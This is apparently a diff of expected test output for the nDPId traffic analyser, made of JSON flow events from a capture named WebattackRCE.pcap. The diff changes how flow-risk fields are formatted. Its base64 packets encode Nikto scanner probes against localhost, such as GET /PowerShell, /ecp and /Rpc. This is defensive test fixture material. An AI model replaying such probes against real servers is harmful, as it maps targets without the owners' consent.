 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"}
